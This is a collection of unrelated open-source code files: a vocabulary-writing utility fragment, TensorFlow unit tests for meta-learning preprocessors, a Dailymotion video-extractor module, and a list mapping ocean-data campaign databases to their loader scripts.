if i == (seq_len - 1):
final_timestep = label_timestep
# Edit final timestep to have class label and weight = 1.
final_timestep.set_label(int(class_label)).set_weight(1.0)
return label_seq
def split_by_punct(segment):
"""Splits str segment by punctuation, filters our empties and spaces."""
return [s for s in re.split(r'\W+', segment) if s and not s.isspace()]
def sort_vocab_by_frequency(vocab_freq_map):
"""Sorts vocab_freq_map by count.
Args:
vocab_freq_map: dict<str term, int count>, vocabulary terms with counts.
Returns:
list<tuple<str term, int count>> sorted by count, descending.
"""
return sorted(
vocab_freq_map.items(), key=operator.itemgetter(1), reverse=True)
def write_vocab_and_frequency(ordered_vocab_freqs, output_dir):
"""Writes ordered_vocab_freqs into vocab.txt and vocab_freq.txt."""
tf.gfile.MakeDirs(output_dir)
with open(os.path.join(output_dir, 'vocab.txt'), 'w') as vocab_f:
with open(os.path.join(output_dir, 'vocab_freq.txt'), 'w') as freq_f:
for word, freq in ordered_vocab_freqs:
vocab_f.write('{}\n'.format(word))
freq_f.write('{}\n'.format(freq))
|
unknown
|
codeparrot/codeparrot-clean
| ||
# coding=utf-8
# Copyright 2021 The Tensor2Robot Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as python3
"""Tests for robotics.learning.estimator_models.meta_learning.preprocessors."""
import functools
from absl.testing import parameterized
import numpy as np
import six
from six.moves import range
from tensor2robot.meta_learning import preprocessors
from tensor2robot.preprocessors import abstract_preprocessor
from tensor2robot.utils import tensorspec_utils as utils
import tensorflow.compat.v1 as tf
from tensorflow.contrib import framework as contrib_framework
nest = contrib_framework.nest
TSpec = utils.TensorSpecStruct
_RANDOM_SEED = 1234
_DEFAULT_IN_IMAGE_SHAPE = (640, 512, 3)
_DEFAULT_OUT_IMAGE_SHAPE = (256, 320, 3)
_DEFAULT_ACTION_SHAPE = (5,)
_DEFAULT_REWARD_SHAPE = (1,)
class MockBasePreprocessor(abstract_preprocessor.AbstractPreprocessor):
def get_in_feature_specification(self, mode):
del mode
feature_spec = TSpec()
feature_spec.image = utils.ExtendedTensorSpec(
shape=_DEFAULT_IN_IMAGE_SHAPE,
dtype=tf.uint8,
is_optional=False,
data_format='jpeg',
name='state/image')
feature_spec.action = utils.ExtendedTensorSpec(
shape=_DEFAULT_ACTION_SHAPE,
dtype=tf.float32,
is_optional=False,
name='state/action')
return feature_spec
def get_out_feature_specification(self, mode):
del mode
feature_spec = TSpec()
feature_spec.image = utils.ExtendedTensorSpec(
shape=_DEFAULT_OUT_IMAGE_SHAPE,
dtype=tf.float32,
is_optional=False,
name='state/image')
feature_spec.original_image = utils.ExtendedTensorSpec(
shape=_DEFAULT_IN_IMAGE_SHAPE, dtype=tf.float32, is_optional=True)
feature_spec.action = utils.ExtendedTensorSpec(
shape=_DEFAULT_ACTION_SHAPE,
dtype=tf.float32,
is_optional=False,
name='state/action')
return feature_spec
def get_in_label_specification(self, mode):
del mode
label_spec = TSpec()
label_spec.reward = utils.ExtendedTensorSpec(
shape=_DEFAULT_REWARD_SHAPE,
dtype=tf.float32,
is_optional=False,
name='reward')
return label_spec
def get_out_label_specification(self, mode):
del mode
label_spec = TSpec()
label_spec.reward = utils.ExtendedTensorSpec(
shape=_DEFAULT_REWARD_SHAPE,
dtype=tf.float32,
is_optional=False,
name='reward')
return label_spec
def _preprocess_fn(self, features, labels, mode):
features.original_image = tf.image.convert_image_dtype(
features.image, tf.float32)
features.image = tf.image.resize_bilinear(
features.original_image,
size=self.get_out_feature_specification(mode).image.shape[:2])
return features, labels
class PreprocessorsTest(tf.test.TestCase, parameterized.TestCase):
def _create_mock_tensors(self,
base_preprocessor,
batch_size,
mode=tf.estimator.ModeKeys.TRAIN):
np.random.seed(_RANDOM_SEED)
features = utils.make_random_numpy(
base_preprocessor.get_in_feature_specification(mode),
batch_size=batch_size)
labels = utils.make_random_numpy(
base_preprocessor.get_in_label_specification(mode),
batch_size=batch_size)
return (features, labels)
def _init_mock(self, batch_size, mode=tf.estimator.ModeKeys.TRAIN):
base_preprocessor = MockBasePreprocessor()
maml_preprocessor = preprocessors.MAMLPreprocessorV2(
base_preprocessor=MockBasePreprocessor())
mock_tensors = self._create_mock_tensors(base_preprocessor, batch_size,
mode)
return maml_preprocessor, mock_tensors
@parameterized.parameters((1, 1), (1, 2), (2, 1), (2, 2))
def test_maml_preprocessor_v2_meta_map_fn_raises(
self, num_condition_samples_per_task, num_inference_samples_per_task):
batch_size = (
num_condition_samples_per_task + num_inference_samples_per_task)
init_mock = self._init_mock(2 * batch_size)
maml_preprocessor, mock_tensors = init_mock
# Create a failure case for not enough data in the batch.
dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
# Note, if drop_remainder = False, the resulting dataset has no static
# shape which is required for the meta preprocessing.
dataset = dataset.batch(batch_size - 1, drop_remainder=True)
# Trigger raise conditions for create_meta_map_fn due to
# num_*_samples_per_task being None or not > 0.
with self.assertRaises(ValueError):
map_fn = maml_preprocessor.create_meta_map_fn(
None, num_inference_samples_per_task)
with self.assertRaises(ValueError):
map_fn = maml_preprocessor.create_meta_map_fn(
num_condition_samples_per_task, None)
with self.assertRaises(ValueError):
map_fn = maml_preprocessor.create_meta_map_fn(
-num_condition_samples_per_task, num_inference_samples_per_task)
with self.assertRaises(ValueError):
map_fn = maml_preprocessor.create_meta_map_fn(
num_condition_samples_per_task, -num_inference_samples_per_task)
map_fn = maml_preprocessor.create_meta_map_fn(
num_condition_samples_per_task, num_inference_samples_per_task)
with self.assertRaises(ValueError):
dataset.map(map_func=map_fn, num_parallel_calls=1)
# Create a failure case for too many examples in a batch.
dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
# Note, if drop_remainder = False, the resulting dataset has no static
# shape which is required for the meta preprocessing.
dataset = dataset.batch(batch_size + 1, drop_remainder=True)
map_fn = maml_preprocessor.create_meta_map_fn(
num_condition_samples_per_task, num_inference_samples_per_task)
with self.assertRaises(ValueError):
dataset.map(map_func=map_fn, num_parallel_calls=1)
# Create a failure case because the batch_size is not known at graph
# construction time.
dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
# Note, if drop_remainder = False, the resulting dataset has no static
# shape which is required for the meta preprocessing.
dataset = dataset.batch(batch_size + 1, drop_remainder=False)
map_fn = maml_preprocessor.create_meta_map_fn(
num_condition_samples_per_task, num_inference_samples_per_task)
with self.assertRaises(ValueError):
dataset.map(map_func=map_fn, num_parallel_calls=1)
@parameterized.parameters((1, 1), (1, 2), (2, 1), (2, 2))
def test_maml_preprocessor_v2_meta_map_fn(
self, num_condition_samples_per_task, num_inference_samples_per_task):
batch_size = (
num_condition_samples_per_task + num_inference_samples_per_task)
init_mock = self._init_mock(2 * batch_size)
maml_preprocessor, mock_tensors = init_mock
with self.session() as sess:
dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
# Note, if drop_remainder = False, the resulting dataset has no static
# shape which is required for the meta preprocessing.
dataset = dataset.batch(batch_size, drop_remainder=True)
map_fn = maml_preprocessor.create_meta_map_fn(
num_condition_samples_per_task, num_inference_samples_per_task)
dataset = dataset.map(map_func=map_fn, num_parallel_calls=1)
raw_meta_features, raw_meta_labels = dataset.make_one_shot_iterator(
).get_next()
np_raw_meta_features, np_raw_meta_labels = sess.run(
[raw_meta_features, raw_meta_labels])
ref_features, ref_labels = mock_tensors
self.assertEqual(
list(np_raw_meta_features.condition.features.keys()),
list(np_raw_meta_features.inference.features.keys()))
for feature_name in np_raw_meta_features.condition.features.keys():
np.testing.assert_array_almost_equal(
np_raw_meta_features.condition.features[feature_name],
ref_features[feature_name][:num_condition_samples_per_task])
np.testing.assert_array_almost_equal(
np_raw_meta_features.inference.features[feature_name],
ref_features[feature_name]
[num_condition_samples_per_task:batch_size])
# The labels and the condition labels have to have the same keys.
self.assertEqual(
list(np_raw_meta_features.condition.labels.keys()),
list(np_raw_meta_labels.keys()))
for label_name in np_raw_meta_features.condition.labels.keys():
np.testing.assert_array_almost_equal(
np_raw_meta_features.condition.labels[label_name],
ref_labels[label_name][:num_condition_samples_per_task])
np.testing.assert_array_almost_equal(
np_raw_meta_labels[label_name],
ref_labels[label_name][num_condition_samples_per_task:batch_size])
@parameterized.parameters((1, 1, 1), (1, 2, 2), (2, 1, 2), (1, 2, 3),
(2, 1, 3), (2, 2, 3))
def test_maml_preprocessor_v2_preprocess(self, num_condition_samples_per_task,
num_inference_samples_per_task,
outer_batch_size):
inner_batch_size = (
num_condition_samples_per_task + num_inference_samples_per_task)
init_mock = self._init_mock(outer_batch_size * inner_batch_size)
maml_preprocessor, mock_tensors = init_mock
with self.session() as sess:
dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
# Note, if drop_remainder = False, the resulting dataset has no static
# shape which is required for the meta preprocessing.
dataset = dataset.batch(inner_batch_size, drop_remainder=True)
map_fn = maml_preprocessor.create_meta_map_fn(
num_condition_samples_per_task, num_inference_samples_per_task)
dataset = dataset.map(map_func=map_fn, num_parallel_calls=1)
# Note, if drop_remainder = False, the resulting dataset has no static
# shape which is required for the meta preprocessing.
dataset = dataset.batch(outer_batch_size, drop_remainder=True)
preprocess_fn = functools.partial(
maml_preprocessor.preprocess, mode=tf.estimator.ModeKeys.TRAIN)
dataset = dataset.map(map_func=preprocess_fn, num_parallel_calls=1)
raw_meta_features, raw_meta_labels = dataset.make_one_shot_iterator(
).get_next()
np_raw_meta_features, np_raw_meta_labels = sess.run(
[raw_meta_features, raw_meta_labels])
ref_features, ref_labels = mock_tensors
self.assertEqual(
list(np_raw_meta_features.condition.features.keys()),
list(np_raw_meta_features.inference.features.keys()))
# The image has been resized. Therefore, we ensure that its shape is
# correct. Note, we have to strip the outer and inner batch dimensions.
self.assertEqual(np_raw_meta_features.condition.features.image.shape[2:],
_DEFAULT_OUT_IMAGE_SHAPE)
self.assertEqual(np_raw_meta_features.inference.features.image.shape[2:],
_DEFAULT_OUT_IMAGE_SHAPE)
# The following tests are important to ensure that our reshaping,
# flattening and unflattening actually preserves all information.
# We can only test those two since the image has been resized.
# Since the featurename has been altered during preprocessing we have
# to index the reference data differently.
# Further, we only test the first batch, since everything afterwards
# would require more index slicing :).
# For the image we have to convert the original data into float32 since
# that is the required conversion for our preprocessor.
np.testing.assert_array_almost_equal(
np_raw_meta_features.condition.features['original_image'][0],
ref_features['image'][:num_condition_samples_per_task].astype(
np.float32) / 255)
np.testing.assert_array_almost_equal(
np_raw_meta_features.inference.features['original_image'][0],
ref_features['image'][num_condition_samples_per_task:inner_batch_size]
.astype(np.float32) / 255)
np.testing.assert_array_almost_equal(
np_raw_meta_features.condition.features['action'][0],
ref_features['action'][:num_condition_samples_per_task])
np.testing.assert_array_almost_equal(
np_raw_meta_features.inference.features['action'][0],
ref_features['action']
[num_condition_samples_per_task:inner_batch_size])
# The labels and the condition labels have to have the same keys.
self.assertEqual(
list(np_raw_meta_features.condition.labels.keys()),
list(np_raw_meta_labels.keys()))
for label_name in np_raw_meta_features.condition.labels.keys():
np.testing.assert_array_almost_equal(
np_raw_meta_features.condition.labels[label_name][0],
ref_labels[label_name][:num_condition_samples_per_task])
np.testing.assert_array_almost_equal(
np_raw_meta_labels[label_name][0], ref_labels[label_name]
[num_condition_samples_per_task:inner_batch_size])
def test_create_metaexample_spec(self):
feature_spec = TSpec()
feature_spec.image = utils.ExtendedTensorSpec(
shape=_DEFAULT_IN_IMAGE_SHAPE,
dtype=tf.uint8,
is_optional=False,
data_format='jpeg',
name='state/image')
feature_spec.action = utils.ExtendedTensorSpec(
shape=_DEFAULT_ACTION_SHAPE,
dtype=tf.float32,
is_optional=False,
name='state/action')
num_samples_in_task = 3
metaexample_spec = preprocessors.create_metaexample_spec(
feature_spec, num_samples_in_task, 'condition')
flat_feature_spec = utils.flatten_spec_structure(feature_spec)
self.assertLen(
list(metaexample_spec.keys()),
num_samples_in_task * len(list(flat_feature_spec.keys())))
for key in flat_feature_spec:
for i in range(num_samples_in_task):
meta_example_key = six.ensure_str(key) + '/{:d}'.format(i)
self.assertIn(meta_example_key, list(metaexample_spec.keys()))
self.assertTrue(
six.ensure_str(metaexample_spec[meta_example_key].name).startswith(
'condition_ep'))
def test_stack_intratask_episodes(self):
feature_spec = TSpec()
feature_spec.image = utils.ExtendedTensorSpec(
shape=_DEFAULT_IN_IMAGE_SHAPE,
dtype=tf.uint8,
is_optional=False,
data_format='jpeg',
name='state/image')
feature_spec.action = utils.ExtendedTensorSpec(
shape=_DEFAULT_ACTION_SHAPE,
dtype=tf.float32,
is_optional=False,
name='state/action')
batch_size = 2
num_samples_in_task = 3
metaexample_spec = preprocessors.create_metaexample_spec(
feature_spec, num_samples_in_task, 'condition')
tensors = utils.make_random_numpy(metaexample_spec, batch_size)
out_tensors = preprocessors.stack_intra_task_episodes(
tensors, num_samples_in_task)
self.assertEqual(
out_tensors.image.shape,
(batch_size, num_samples_in_task) + _DEFAULT_IN_IMAGE_SHAPE)
self.assertEqual(
out_tensors.action.shape,
(batch_size, num_samples_in_task) + _DEFAULT_ACTION_SHAPE)
@parameterized.parameters((1, 1, 1), (1, 2, 2), (2, 1, 2), (1, 2, 3),
(2, 1, 3), (2, 3, 1))
def test_meta_example_preprocess(
self,
num_condition_samples_per_task,
num_inference_samples_per_task,
outer_batch_size):
base_preprocessor = MockBasePreprocessor()
meta_example_preprocessor = preprocessors.FixedLenMetaExamplePreprocessor(
base_preprocessor=base_preprocessor,
num_condition_samples_per_task=num_condition_samples_per_task,
num_inference_samples_per_task=num_inference_samples_per_task)
mock_tensors = self._create_mock_tensors(
meta_example_preprocessor, outer_batch_size)
with self.session() as sess:
dataset = tf.data.Dataset.from_tensor_slices(mock_tensors)
dataset = dataset.batch(outer_batch_size, drop_remainder=True)
preprocess_fn = functools.partial(
meta_example_preprocessor.preprocess,
mode=tf.estimator.ModeKeys.TRAIN)
dataset = dataset.map(map_func=preprocess_fn, num_parallel_calls=1)
raw_meta_features, raw_meta_labels = (
dataset.make_one_shot_iterator().get_next())
np_raw_meta_features, np_raw_meta_labels = sess.run(
[raw_meta_features, raw_meta_labels])
ref_features, ref_labels = mock_tensors
self.assertEqual(
list(np_raw_meta_features.condition.features.keys()),
list(np_raw_meta_features.inference.features.keys()))
# The labels and the condition labels have to have the same keys.
self.assertEqual(
list(np_raw_meta_features.condition.labels.keys()),
list(np_raw_meta_labels.keys()))
# The image has been resized. Therefore, we ensure that its shape is
# correct. Note, we have to strip the outer and inner batch dimensions.
self.assertEqual(
np_raw_meta_features.condition.features.image.shape[2:],
_DEFAULT_OUT_IMAGE_SHAPE)
self.assertEqual(
np_raw_meta_features.inference.features.image.shape[2:],
_DEFAULT_OUT_IMAGE_SHAPE)
for i in range(num_condition_samples_per_task):
np.testing.assert_array_almost_equal(
np_raw_meta_features.condition.features['action'][:, i, Ellipsis],
ref_features['condition/features/action/{:d}'.format(i)])
for label_name in np_raw_meta_features.condition.labels.keys():
np.testing.assert_array_almost_equal(
np_raw_meta_features.condition.labels[label_name][:, i, Ellipsis],
ref_features['condition/labels/{:s}/{:d}'.format(
label_name, i)])
for i in range(num_inference_samples_per_task):
np.testing.assert_array_almost_equal(
np_raw_meta_features.inference.features['action'][:, i, Ellipsis],
ref_features['inference/features/action/{:d}'.format(i)])
for label_name in np_raw_meta_features.condition.labels.keys():
np.testing.assert_array_almost_equal(
np_raw_meta_labels[label_name][:, i, Ellipsis],
ref_labels[six.ensure_str(label_name) + '/{:d}'.format(i)])
if __name__ == '__main__':
tf.test.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# coding: utf-8
from __future__ import unicode_literals
import re
import json
import itertools
from .common import InfoExtractor
from ..compat import (
compat_str,
compat_urllib_request,
)
from ..utils import (
ExtractorError,
determine_ext,
int_or_none,
parse_iso8601,
str_to_int,
unescapeHTML,
)
class DailymotionBaseInfoExtractor(InfoExtractor):
@staticmethod
def _build_request(url):
"""Build a request with the family filter disabled"""
request = compat_urllib_request.Request(url)
request.add_header('Cookie', 'family_filter=off; ff=off')
return request
def _download_webpage_handle_no_ff(self, url, *args, **kwargs):
request = self._build_request(url)
return self._download_webpage_handle(request, *args, **kwargs)
def _download_webpage_no_ff(self, url, *args, **kwargs):
request = self._build_request(url)
return self._download_webpage(request, *args, **kwargs)
class DailymotionIE(DailymotionBaseInfoExtractor):
_VALID_URL = r'(?i)(?:https?://)?(?:(www|touch)\.)?dailymotion\.[a-z]{2,3}/(?:(embed|#)/)?video/(?P<id>[^/?_]+)'
IE_NAME = 'dailymotion'
_FORMATS = [
('stream_h264_ld_url', 'ld'),
('stream_h264_url', 'standard'),
('stream_h264_hq_url', 'hq'),
('stream_h264_hd_url', 'hd'),
('stream_h264_hd1080_url', 'hd180'),
]
_TESTS = [
{
'url': 'https://www.dailymotion.com/video/x2iuewm_steam-machine-models-pricing-listed-on-steam-store-ign-news_videogames',
'md5': '2137c41a8e78554bb09225b8eb322406',
'info_dict': {
'id': 'x2iuewm',
'ext': 'mp4',
'title': 'Steam Machine Models, Pricing Listed on Steam Store - IGN News',
'description': 'Several come bundled with the Steam Controller.',
'thumbnail': 're:^https?:.*\.(?:jpg|png)$',
'duration': 74,
'timestamp': 1425657362,
'upload_date': '20150306',
'uploader': 'IGN',
'uploader_id': 'xijv66',
'age_limit': 0,
'view_count': int,
'comment_count': int,
}
},
# Vevo video
{
'url': 'http://www.dailymotion.com/video/x149uew_katy-perry-roar-official_musi',
'info_dict': {
'title': 'Roar (Official)',
'id': 'USUV71301934',
'ext': 'mp4',
'uploader': 'Katy Perry',
'upload_date': '20130905',
},
'params': {
'skip_download': True,
},
'skip': 'VEVO is only available in some countries',
},
# age-restricted video
{
'url': 'http://www.dailymotion.com/video/xyh2zz_leanna-decker-cyber-girl-of-the-year-desires-nude-playboy-plus_redband',
'md5': '0d667a7b9cebecc3c89ee93099c4159d',
'info_dict': {
'id': 'xyh2zz',
'ext': 'mp4',
'title': 'Leanna Decker - Cyber Girl Of The Year Desires Nude [Playboy Plus]',
'uploader': 'HotWaves1012',
'age_limit': 18,
}
}
]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage_no_ff(
'https://www.dailymotion.com/video/%s' % video_id, video_id)
age_limit = self._rta_search(webpage)
description = self._og_search_description(webpage) or self._html_search_meta(
'description', webpage, 'description')
view_count = str_to_int(self._search_regex(
[r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserPlays:(\d+)"',
r'video_views_count[^>]+>\s+([\d\.,]+)'],
webpage, 'view count', fatal=False))
comment_count = int_or_none(self._search_regex(
r'<meta[^>]+itemprop="interactionCount"[^>]+content="UserComments:(\d+)"',
webpage, 'comment count', fatal=False))
player_v5 = self._search_regex(
r'playerV5\s*=\s*dmp\.create\([^,]+?,\s*({.+?})\);',
webpage, 'player v5', default=None)
if player_v5:
player = self._parse_json(player_v5, video_id)
metadata = player['metadata']
formats = []
for quality, media_list in metadata['qualities'].items():
for media in media_list:
media_url = media.get('url')
if not media_url:
continue
type_ = media.get('type')
if type_ == 'application/vnd.lumberjack.manifest':
continue
if type_ == 'application/x-mpegURL' or determine_ext(media_url) == 'm3u8':
formats.extend(self._extract_m3u8_formats(
media_url, video_id, 'mp4', m3u8_id='hls'))
else:
f = {
'url': media_url,
'format_id': quality,
}
m = re.search(r'H264-(?P<width>\d+)x(?P<height>\d+)', media_url)
if m:
f.update({
'width': int(m.group('width')),
'height': int(m.group('height')),
})
formats.append(f)
self._sort_formats(formats)
title = metadata['title']
duration = int_or_none(metadata.get('duration'))
timestamp = int_or_none(metadata.get('created_time'))
thumbnail = metadata.get('poster_url')
uploader = metadata.get('owner', {}).get('screenname')
uploader_id = metadata.get('owner', {}).get('id')
subtitles = {}
for subtitle_lang, subtitle in metadata.get('subtitles', {}).get('data', {}).items():
subtitles[subtitle_lang] = [{
'ext': determine_ext(subtitle_url),
'url': subtitle_url,
} for subtitle_url in subtitle.get('urls', [])]
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'duration': duration,
'timestamp': timestamp,
'uploader': uploader,
'uploader_id': uploader_id,
'age_limit': age_limit,
'view_count': view_count,
'comment_count': comment_count,
'formats': formats,
'subtitles': subtitles,
}
# vevo embed
vevo_id = self._search_regex(
r'<link rel="video_src" href="[^"]*?vevo.com[^"]*?video=(?P<id>[\w]*)',
webpage, 'vevo embed', default=None)
if vevo_id:
return self.url_result('vevo:%s' % vevo_id, 'Vevo')
# fallback old player
embed_page = self._download_webpage_no_ff(
'https://www.dailymotion.com/embed/video/%s' % video_id,
video_id, 'Downloading embed page')
timestamp = parse_iso8601(self._html_search_meta(
'video:release_date', webpage, 'upload date'))
info = self._parse_json(
self._search_regex(
r'var info = ({.*?}),$', embed_page,
'video info', flags=re.MULTILINE),
video_id)
if info.get('error') is not None:
msg = 'Couldn\'t get video, Dailymotion says: %s' % info['error']['title']
raise ExtractorError(msg, expected=True)
formats = []
for (key, format_id) in self._FORMATS:
video_url = info.get(key)
if video_url is not None:
m_size = re.search(r'H264-(\d+)x(\d+)', video_url)
if m_size is not None:
width, height = map(int_or_none, (m_size.group(1), m_size.group(2)))
else:
width, height = None, None
formats.append({
'url': video_url,
'ext': 'mp4',
'format_id': format_id,
'width': width,
'height': height,
})
self._sort_formats(formats)
# subtitles
video_subtitles = self.extract_subtitles(video_id, webpage)
title = self._og_search_title(webpage, default=None)
if title is None:
title = self._html_search_regex(
r'(?s)<span\s+id="video_title"[^>]*>(.*?)</span>', webpage,
'title')
return {
'id': video_id,
'formats': formats,
'uploader': info['owner.screenname'],
'timestamp': timestamp,
'title': title,
'description': description,
'subtitles': video_subtitles,
'thumbnail': info['thumbnail_url'],
'age_limit': age_limit,
'view_count': view_count,
'duration': info['duration']
}
def _get_subtitles(self, video_id, webpage):
try:
sub_list = self._download_webpage(
'https://api.dailymotion.com/video/%s/subtitles?fields=id,language,url' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % compat_str(err))
return {}
info = json.loads(sub_list)
if (info['total'] > 0):
sub_lang_list = dict((l['language'], [{'url': l['url'], 'ext': 'srt'}]) for l in info['list'])
return sub_lang_list
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
class DailymotionPlaylistIE(DailymotionBaseInfoExtractor):
IE_NAME = 'dailymotion:playlist'
_VALID_URL = r'(?:https?://)?(?:www\.)?dailymotion\.[a-z]{2,3}/playlist/(?P<id>.+?)/'
_MORE_PAGES_INDICATOR = r'(?s)<div class="pages[^"]*">.*?<a\s+class="[^"]*?icon-arrow_right[^"]*?"'
_PAGE_TEMPLATE = 'https://www.dailymotion.com/playlist/%s/%s'
_TESTS = [{
'url': 'http://www.dailymotion.com/playlist/xv4bw_nqtv_sport/1#video=xl8v3q',
'info_dict': {
'title': 'SPORT',
'id': 'xv4bw_nqtv_sport',
},
'playlist_mincount': 20,
}]
def _extract_entries(self, id):
video_ids = set()
processed_urls = set()
for pagenum in itertools.count(1):
page_url = self._PAGE_TEMPLATE % (id, pagenum)
webpage, urlh = self._download_webpage_handle_no_ff(
page_url, id, 'Downloading page %s' % pagenum)
if urlh.geturl() in processed_urls:
self.report_warning('Stopped at duplicated page %s, which is the same as %s' % (
page_url, urlh.geturl()), id)
break
processed_urls.add(urlh.geturl())
for video_id in re.findall(r'data-xid="(.+?)"', webpage):
if video_id not in video_ids:
yield self.url_result('http://www.dailymotion.com/video/%s' % video_id, 'Dailymotion')
video_ids.add(video_id)
if re.search(self._MORE_PAGES_INDICATOR, webpage) is None:
break
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
playlist_id = mobj.group('id')
webpage = self._download_webpage(url, playlist_id)
return {
'_type': 'playlist',
'id': playlist_id,
'title': self._og_search_title(webpage),
'entries': self._extract_entries(playlist_id),
}
class DailymotionUserIE(DailymotionPlaylistIE):
IE_NAME = 'dailymotion:user'
_VALID_URL = r'https?://(?:www\.)?dailymotion\.[a-z]{2,3}/(?!(?:embed|#|video|playlist)/)(?:(?:old/)?user/)?(?P<user>[^/]+)'
_PAGE_TEMPLATE = 'http://www.dailymotion.com/user/%s/%s'
_TESTS = [{
'url': 'https://www.dailymotion.com/user/nqtv',
'info_dict': {
'id': 'nqtv',
'title': 'Rémi Gaillard',
},
'playlist_mincount': 100,
}, {
'url': 'http://www.dailymotion.com/user/UnderProject',
'info_dict': {
'id': 'UnderProject',
'title': 'UnderProject',
},
'playlist_mincount': 1800,
'expected_warnings': [
'Stopped at duplicated page',
],
'skip': 'Takes too long time',
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
user = mobj.group('user')
webpage = self._download_webpage(
'https://www.dailymotion.com/user/%s' % user, user)
full_user = unescapeHTML(self._html_search_regex(
r'<a class="nav-image" title="([^"]+)" href="/%s">' % re.escape(user),
webpage, 'user'))
return {
'_type': 'playlist',
'id': user,
'title': full_user,
'entries': self._extract_entries(user),
}
class DailymotionCloudIE(DailymotionBaseInfoExtractor):
_VALID_URL_PREFIX = r'http://api\.dmcloud\.net/(?:player/)?embed/'
_VALID_URL = r'%s[^/]+/(?P<id>[^/?]+)' % _VALID_URL_PREFIX
_VALID_EMBED_URL = r'%s[^/]+/[^\'"]+' % _VALID_URL_PREFIX
_TESTS = [{
# From http://www.francetvinfo.fr/economie/entreprises/les-entreprises-familiales-le-secret-de-la-reussite_933271.html
# Tested at FranceTvInfo_2
'url': 'http://api.dmcloud.net/embed/4e7343f894a6f677b10006b4/556e03339473995ee145930c?auth=1464865870-0-jyhsm84b-ead4c701fb750cf9367bf4447167a3db&autoplay=1',
'only_matching': True,
}, {
# http://www.francetvinfo.fr/societe/larguez-les-amarres-le-cobaturage-se-developpe_980101.html
'url': 'http://api.dmcloud.net/player/embed/4e7343f894a6f677b10006b4/559545469473996d31429f06?auth=1467430263-0-90tglw2l-a3a4b64ed41efe48d7fccad85b8b8fda&autoplay=1',
'only_matching': True,
}]
@classmethod
def _extract_dmcloud_url(self, webpage):
mobj = re.search(r'<iframe[^>]+src=[\'"](%s)[\'"]' % self._VALID_EMBED_URL, webpage)
if mobj:
return mobj.group(1)
mobj = re.search(
r'<input[^>]+id=[\'"]dmcloudUrlEmissionSelect[\'"][^>]+value=[\'"](%s)[\'"]' % self._VALID_EMBED_URL,
webpage)
if mobj:
return mobj.group(1)
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage_no_ff(url, video_id)
title = self._html_search_regex(r'<title>([^>]+)</title>', webpage, 'title')
video_info = self._parse_json(self._search_regex(
r'var\s+info\s*=\s*([^;]+);', webpage, 'video info'), video_id)
# TODO: parse ios_url, which is in fact a manifest
video_url = video_info['mp4_url']
return {
'id': video_id,
'url': video_url,
'title': title,
'thumbnail': video_info.get('thumbnail_url'),
}
|
unknown
|
codeparrot/codeparrot-clean
| ||
# File: mbari_campaigns.py
#
# Create a symbolic link named campaigns.py to tell the Django server
# to serve these databases: ln -s mbari_campaigns.py campaigns.py.
# The stoqs/loaders/load.py script uses the load commands associated
# with each database to execute the load and record the provenance.
# Execute 'stoqs/loaders/load.py --help' for more information.
from collections import OrderedDict
# Keys are database (campaign) names, values are paths to load script
# for each campaign starting at the stoqs/loaders directory. The full
# path of 'stoqs/loaders/' is prepended to the value and then executed.
campaigns = OrderedDict([
('stoqs_rovctd_mb', 'ROVCTD/loadMB_Dives.sh'),
('stoqs_rovctd_mw93', 'ROVCTD/loadAllTransectDives.sh'),
('stoqs_rovctd_mw97', 'ROVCTD/loadTransectDives_mw97.sh'),
('stoqs_oceansites_o', 'OceanSITES/load_moorings.py -o'),
('stoqs_rovctd_goc', 'ROVCTD/loadGoC_Dives.sh'),
('stoqs_september2010', 'CANON/loadCANON_september2010.py'),
('stoqs_october2010', 'CANON/loadCANON_october2010.py'),
('stoqs_dorado2009', 'MolecularEcology/load_dorado2009.py'),
('stoqs_dorado2011', 'MolecularEcology/load_dorado2011.py'),
('stoqs_april2011', 'CANON/loadCANON_april2011.py'),
('stoqs_june2011', 'CANON/loadCANON_june2011.py'),
('stoqs_september2011', 'CANON/loadCANON_september2011.py'),
('stoqs_february2012', 'MolecularEcology/loadGOC_february2012.py'),
('stoqs_may2012', 'CANON/loadCANON_may2012.py'),
('stoqs_september2012', 'CANON/loadCANON_september2012.py'),
('stoqs_ioos_gliders', 'IOOS/load_gliders.py'),
('stoqs_march2013', 'CANON/loadCANON_march2013.py'),
('stoqs_march2013_o', 'CANON/loadCANON_march2013.py -o'),
('stoqs_beds_canyon_events', 'BEDS/loadBEDS_CanyonEvents.py'),
('stoqs_simz_aug2013', 'MolecularEcology/loadSIMZ_aug2013.py'),
('stoqs_september2013', 'CANON/loadCANON_september2013.py'),
('stoqs_september2013_o', 'CANON/loadCANON_september2013.py -o'),
('stoqs_cn13id_oct2013', 'CANON/loadCN13ID_october2013.py'),
('stoqs_simz_oct2013', 'MolecularEcology/loadSIMZ_oct2013.py'),
('stoqs_simz_spring2014', 'MolecularEcology/loadSIMZ_spring2014.py'),
('stoqs_canon_april2014', 'CANON/loadCANON_april2014.py'),
('stoqs_simz_jul2014', 'MolecularEcology/loadSIMZ_jul2014.py'),
('stoqs_september2014', 'CANON/loadCANON_september2014.py'),
('stoqs_simz_oct2014', 'MolecularEcology/loadSIMZ_oct2014.py'),
('stoqs_canon_may2015', 'CANON/loadCANON_may2015.py'),
('stoqs_os2015', 'CANON/loadCANON_os2015.py'),
('stoqs_canon_september2015', 'CANON/loadCANON_september2015.py'),
